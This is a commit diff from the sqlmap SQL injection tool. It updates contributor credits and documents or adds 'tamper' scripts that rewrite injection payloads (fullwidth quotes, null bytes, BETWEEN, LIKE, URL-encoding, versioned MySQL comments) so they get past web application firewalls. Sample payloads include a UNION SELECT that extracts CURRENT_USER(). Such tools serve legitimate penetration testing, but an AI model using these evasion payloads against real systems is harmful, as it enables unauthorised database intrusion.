Develop-Python
diff --git a/‎doc/THANKS‎
Lines changed: 11 additions & 1 deletion b/‎doc/THANKS‎
Lines changed: 11 additions & 1 deletion
diff --git a/‎lib/core/option.py‎
Lines changed: 6 additions & 3 deletions b/‎lib/core/option.py‎
Lines changed: 6 additions & 3 deletions
diff --git a/‎tamper/apostrophemask.py‎
Lines changed: 14 additions & 6 deletions b/‎tamper/apostrophemask.py‎
Lines changed: 14 additions & 6 deletions
diff --git a/‎tamper/appendnullbyte.py‎
Lines changed: 17 additions & 4 deletions b/‎tamper/appendnullbyte.py‎
Lines changed: 17 additions & 4 deletions
diff --git a/‎tamper/between.py‎
Lines changed: 20 additions & 2 deletions b/‎tamper/between.py‎
Lines changed: 20 additions & 2 deletions
diff --git a/‎tamper/charencode.py‎
Lines changed: 21 additions & 2 deletions b/‎tamper/charencode.py‎
Lines changed: 21 additions & 2 deletions
diff --git a/‎tamper/charunicodeencode.py‎
Lines changed: 12 additions & 3 deletions b/‎tamper/charunicodeencode.py‎
Lines changed: 12 additions & 3 deletions
diff --git a/‎tamper/equaltolike.py‎
Lines changed: 22 additions & 2 deletions b/‎tamper/equaltolike.py‎
Lines changed: 22 additions & 2 deletions
diff --git a/‎tamper/halfversionedmorekeywords.py‎
Lines changed: 58 additions & 0 deletions b/‎tamper/halfversionedmorekeywords.py‎
Lines changed: 58 additions & 0 deletions
diff --git a/‎tamper/ifnull2ifisnull.py‎
Lines changed: 20 additions & 3 deletions b/‎tamper/ifnull2ifisnull.py‎
Lines changed: 20 additions & 3 deletions
@@ -26,6 +26,10 @@ Otavio Augusto <otavioarj@gmail.com>
 Simon Baker <simonb@sec-1.com>
     for reporting some bugs
 
+Ryan Barnett <RBarnett@trustwave.com>
+    for organizing the ModSecurity SQL injection challenge,
+    http://modsecurity.org/demo/challenge.html
+
 Emiliano Bazaes <emiliano@7espejos.com>
     for reporting a minor bug
 
@@ -295,6 +299,9 @@ David McNab <david@conscious.co.nz>
 Spencer J. McIntyre <smcintyre@securestate.com>
     for reporting a minor bug
 
+Ahmad Maulana <matdhule@gmail.com>
+    for providing one tamper scripts, halfversionedmorekeywords.py
+
 Enrico Milanese <enricomilanese@gmail.com>
     for reporting a bugs when using (-a) a single line User-Agent file
     for providing me with some ideas for the PHP backdoor
@@ -327,6 +334,9 @@ Simone Onofri <simone.onofri@gmail.com>
     for patching the PHP web backdoor to make it work properly also on
     Windows
 
+Michele Orru <michele.orru@antisnatchor.com>
+    for reporting a minor bug
+
 Shaohua Pan <pan@knownsec.com>
     for reporting several bugs
     for suggesting a few features
@@ -545,7 +555,7 @@ pacman730 <pacman730@users.sourceforge.net>
     for reporting a bug
 
 Phat R. <phatthanaphol@gmail.com>
-    for reporting a minor bug
+    for reporting a few bugs
 
 Phil P <@superevr>
     for suggesting a minor enhancement
 
@@ -825,7 +825,7 @@ def __setTamperingFunctions():
                     if check_priority and priority > last_priority:
                         message = "it seems that you might have mixed "
                         message += "the order of tamper scripts.\n"
-                        message += "Do you want to auto resolve this? [Y/n/q]"
+                        message += "Do you want to auto resolve this? [Y/n/q] "
                         test = readInput(message, default="Y")
 
                         if not test or test[0] in ("y", "Y"):
@@ -841,6 +841,8 @@ def __setTamperingFunctions():
                     last_priority = priority
 
                     break
+                elif name == "dependencies":
+                    function()
 
             if not found:
                 raise sqlmapGenericException, "missing function 'tamper(value)' in tamper script '%s'" % tfile
@@ -981,8 +983,9 @@ def __setPrefixSuffix():
         else:
             boundary.ptype = 1
 
-        # user who knows for --prefix/--suffix doesn't want other combinations
-        conf.boundaries = [boundary]
+        # user who provides --prefix/--suffix does not want other boundaries
+        # to be tested for
+        conf.boundaries = [ boundary ]
 
 def __setHTTPAuthentication():
     """
 
@@ -7,18 +7,26 @@
 See the file 'doc/COPYING' for copying permission
 """
 
-import string
-
 from lib.core.enums import PRIORITY
-from lib.core.exception import sqlmapUnsupportedFeatureException
 
 __priority__ = PRIORITY.LOWEST
 
+def dependencies():
+    pass
+
 def tamper(payload):
     """
-    Replaces apostrophe character with it's UTF8 fullwidth counterpart
-    Example: "AND '1'='1'" becomes "AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87"
-    Reference: http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
+    Replaces apostrophe character with its UTF-8 full width counterpart
+
+    Example:
+        * Input: AND '1'='1'
+        * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
+
+    References:
+        * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
+        * http://lukasz.pilorz.net/testy/unicode_conversion/
+        * http://sla.ckers.org/forum/read.php?13,11562,11850
+        * http://lukasz.pilorz.net/testy/full_width_utf/index.phps
     """
 
     retVal = payload
 
@@ -7,16 +7,29 @@
 See the file 'doc/COPYING' for copying permission
 """
 
-import string
-
 from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.LOWEST
 
+def dependencies():
+    pass
+
 def tamper(payload):
     """
-    Appends encoded null byte character at the end of payload
-    Example: "AND 1=1" becomes "AND 1=1%00"
+    Appends encoded NULL byte character at the end of payload
+
+    Example:
+        * Input: AND 1=1
+        * Output: AND 1=1%00
+
+    Requirement:
+        * Microsoft Access
+
+    Notes:
+        * Useful to bypass weak web application firewalls when the back-end
+          database management system is Microsoft Access - further uses are
+          also possible
+
     Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
     """
 
 
@@ -11,10 +11,28 @@
 
 __priority__ = PRIORITY.HIGHEST
 
+def dependencies():
+    pass
+
 def tamper(payload):
     """
-    Replaces '>' with 'NOT BETWEEN 0 AND #'
-    Example: 'A > B' becomes 'A NOT BETWEEN 0 AND B'
+    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
+
+    Example:
+        * Input: 'A > B'
+        * Output: 'A NOT BETWEEN 0 AND B'
+
+    Tested against:
+        * Microsoft SQL Server 2005
+        * MySQL 4, 5.0 and 5.5
+        * Oracle 10g
+        * PostgreSQL 8.3, 8.4, 9.0
+
+    Notes:
+        * Useful to bypass weak and bespoke web application firewalls that
+          filter the greater than character
+        * The BETWEEN clause is SQL standard. Hence, this tamper script
+          should work against all (?) databases
     """
 
     retVal = payload
 
@@ -14,10 +14,29 @@
 
 __priority__ = PRIORITY.LOWEST
 
+def dependencies():
+    pass
+
 def tamper(payload):
     """
-    Urlencodes all characters in a given payload (not processing already encoded)
-    Example: 'SELECT FIELD FROM%20TABLE' becomes '%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45'
+    Url-encodes all characters in a given payload (not processing already
+    encoded)
+
+    Example:
+        * Input: SELECT FIELD FROM%20TABLE
+        * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
+
+    Tested against:
+        * Microsoft SQL Server 2005
+        * MySQL 4, 5.0 and 5.5
+        * Oracle 10g
+        * PostgreSQL 8.3, 8.4, 9.0
+
+    Notes:
+        * Useful to bypass very weak web application firewalls that do not
+          url-decode the request before processing it through their ruleset
+        * The web server will anyway pass the url-decoded version behind,
+          hence it should work against any DBMS
     """
 
     retVal = payload
 
@@ -10,14 +10,23 @@
 import string
 
 from lib.core.enums import PRIORITY
-from lib.core.exception import sqlmapUnsupportedFeatureException
 
 __priority__ = PRIORITY.LOWEST
 
+def dependencies():
+    pass
+
 def tamper(payload):
     """
-    Replaces payload with unicode-urlencode of non-encoded chars in payload (not processing already encoded)
-    Example: 'SELECT FIELD%20FROM TABLE' becomes '%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
+    Unicode-url-encodes non-encoded characters in a given payload (not
+    processing already encoded)
+
+    Example:
+        * Input: SELECT FIELD%20FROM TABLE
+        * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
+
+    Notes:
+        * Does this ever work?
     """
 
     retVal = payload
 
@@ -7,21 +7,41 @@
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
 import re
 
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.HIGHEST
 
+def dependencies():
+    singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__)[:-3], DBMS.PGSQL))
+
 def tamper(payload):
     """
-    Replaces all occurances of operator = with operator LIKE
-    Example: 'SELECT * FROM users WHERE id=1' becomes 'SELECT * FROM users WHERE id LIKE 1'
+    Replaces all occurances of operator equal ('=') with operator 'LIKE'
+
+    Example:
+        * Input: SELECT * FROM users WHERE id=1
+        * Output: SELECT * FROM users WHERE id LIKE 1
+
+    Tested against:
+        * Microsoft SQL Server 2005
+        * MySQL 4, 5.0 and 5.5
+
+    Notes:
+        * Useful to bypass weak and bespoke web application firewalls that
+          filter the greater than character
+        * The LIKE operator is SQL standard. Hence, this tamper script
+          should work against all (?) databases
     """
 
     def process(match):
         word = match.group()
         word = "%sLIKE%s" % (" " if word[0]!=" " else "", " " if word[-1]!=" " else "")
+
         return word
 
     retVal = payload
 
@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://sqlmap.sourceforge.net/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import re
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.data import kb
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
+
+__priority__ = PRIORITY.HIGHER
+
+def dependencies():
+    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.0" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
+
+def tamper(payload):
+    """
+    Adds versioned MySQL comment before each keyword
+
+    Example:
+        * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
+        * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
+
+    Requirement:
+        * MySQL < 5.0
+
+    Tested against:
+        * MySQL 4.0.18
+
+    Notes:
+        * Useful to bypass several web application firewalls when the
+          back-end database management system is MySQL
+        * Used during the ModSecurity SQL injection challenge,
+          http://modsecurity.org/demo/challenge.html
+    """
+
+    def process(match):
+        word = match.group('word')
+        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
+            return match.group().replace(word, "/*!0%s" % word)
+        else:
+            return match.group()
+
+    retVal = payload
+
+    if payload:
+        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
+        retVal = retVal.replace(" /*!0", "/*!0")
+
+    return retVal
@@ -11,14 +11,31 @@
 
 __priority__ = PRIORITY.HIGHEST
 
+def dependencies():
+    pass
+
 def tamper(payload):
     """
-    Replaces 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
-    Example: 'IFNULL(1, 2)' becomes 'IF(ISNULL(1), 2, 1)'
+    Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
+
+    Example:
+        * Input: IFNULL(1, 2)
+        * Output: IF(ISNULL(1), 2, 1)
+
+    Requirement:
+        * MySQL
+        * SQLite (possibly)
+        * SAP MaxDB (possibly)
+
+    Tested against:
+        * MySQL 5.0 and 5.5
+
+    Notes:
+        * Useful to bypass very weak and bespoke web application firewalls
+          that filter the IFNULL() function
     """
 
     if payload and payload.find("IFNULL") > -1:
-
         while payload.find("IFNULL(") > -1:
             index = payload.find("IFNULL(")
             deepness = 1